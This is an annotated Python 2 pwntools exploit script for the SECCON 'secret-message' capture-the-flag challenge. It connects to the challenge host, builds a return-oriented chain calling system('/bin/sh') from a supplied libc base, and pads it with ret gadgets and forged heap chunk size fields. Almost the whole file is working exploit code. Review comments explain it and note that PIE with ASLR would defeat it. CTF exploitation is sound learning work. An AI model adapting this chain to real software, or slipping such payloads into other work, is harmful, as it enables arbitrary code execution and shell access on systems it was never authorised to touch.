#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Auth0r : afang
# nice day mua! :P
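# desc: pwntools (Python 2) client that sends a crafted payload to the
#       "secret-message" SECCON pwn challenge service.
# args: argv[1] = message length, argv[2] = filename,
#       argv[3] = libc base address as a hex string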

# helpers:
def wait(x):
    """Block until the operator presses Enter, showing *x* as the prompt.

    Python 2 only (uses ``raw_input``). Nothing in this script calls it;
    it is a manual pause hook, e.g. for attaching a debugger.
    """
    return raw_input(x)

# imports

from pwn import *
import time
import os
import sys

# Module-level settings.
# NOTE(review): elf, env and LOCAL are assigned here but never read anywhere in
# this script; libc is overwritten from sys.argv[3] further down.
elf = ""
libc = ""
env = ""
LOCAL = 1
# "debug" makes pwntools log all traffic sent and received on the connection.
context.log_level = "debug"
# Declares amd64 as the target architecture in the pwntools context.
context.arch = "amd64"

# Local test endpoint, left disabled by the author.
#p2 = remote("127.0.0.1",2222)
# Opens a TCP connection to the hard-coded challenge host as soon as the script
# runs. LOCAL is not consulted, and there is no error handling around the call.
p2 = remote("secret-message.pwn.seccon.jp", 31337)
# Python 2 print statement: echo whatever the service sends first
# (presumably its banner/menu).
print p2.recv()

# Build the input used in the service's dialogue below (author's label:
# "create file"). Nothing here touches the local filesystem.

# NOTE(review): block1 is never used.
block1 = ""

# libc base address as a hex string, taken from the command line. The script
# does not discover it itself, so it has to come from a separate step.
# Unvalidated: a missing argument raises IndexError, a non-hex value raises
# ValueError at int() below.
libc = sys.argv[3]

# Hard-coded absolute address inside the target binary, named as a
# "pop rdi; ret" gadget. A fixed address only works if the binary is loaded at a
# fixed base (presumably a non-PIE build; confirm against the binary).
pop_rdi = p64(0x0000000000406583)
# Offsets added to the supplied libc base. They are tied to one specific libc
# build; a different libc on the target makes both values wrong.
system = int(libc,16) + 0x45390
# presumably a bare `ret` gadget used as padding (repeated 30 times below);
# verify against the libc in question
nop = int(libc,16) + 0x00000000000080d8
# 32-byte return-oriented chain: gadget, argument for rdi, system(), followed by
# the "/bin/sh" string. 0x60a300 is presumably where that string ends up in the
# target's memory; TODO confirm against the binary.
rop_payload = pop_rdi + p64(0x60a300) + p64(system) + "/bin/sh\x00"
# Newline check: the prompts below are line-oriented, so a 0x0a byte would cut
# the input short. NOTE(review): this only prints a warning and carries on, and
# it inspects rop_payload only, not the `nop` addresses added to payload1.
if "\n" in rop_payload:
    print "no!!!!"
# Always 32 for the chain built above.
print len(rop_payload)

# Layout: one pointer (0x60a310), 30 copies of `nop`, the chain, then three 0x21
# qwords separated by 0x18 filler bytes (presumably fake heap chunk size fields;
# confirm against the target's allocator state). That is 0x160 bytes in total,
# padded with "a" to exactly 0x200.
# Defensive reading: the payload depends on fixed binary addresses and a known
# libc base, so PIE together with ASLR and no address leak would invalidate it.
payload1 = p64(0x60a310) + p64(nop) * 30 + rop_payload + p64(0x21) + "a" * 0x18 + p64(0x21) + "a" * 0x18 + p64(0x21)
payload1 = payload1.ljust(0x200,"a")

# Walk through the service's text dialogue. Each recvuntil() waits for the exact
# prompt string and is called without a timeout argument, so a changed prompt
# would stall the script here.
p2.sendline("e")  # menu choice "e"; its meaning is not shown in this script
p2.recvuntil("to : \n")
# The same 0x200-byte buffer is sent for both the "to" and "from" fields, with
# send() rather than sendline(), so no trailing newline is added.
p2.send(payload1)
p2.recvuntil("from : \n")
p2.send(payload1)
p2.recvuntil("filename : \n")
p2.sendline(sys.argv[2])  # filename, passed through unvalidated
p2.recvuntil("message length :\n")
# argv[1] is already a string, so str() is redundant. The length is not checked
# to be numeric before it is sent.
p2.sendline(str(sys.argv[1]))
p2.recvuntil("message : \n")
# No message body is sent: the script waits one second and drops the connection
# (presumably the disconnect is what the author relies on; confirm against the
# service's behaviour).
time.sleep(1)
p2.close()


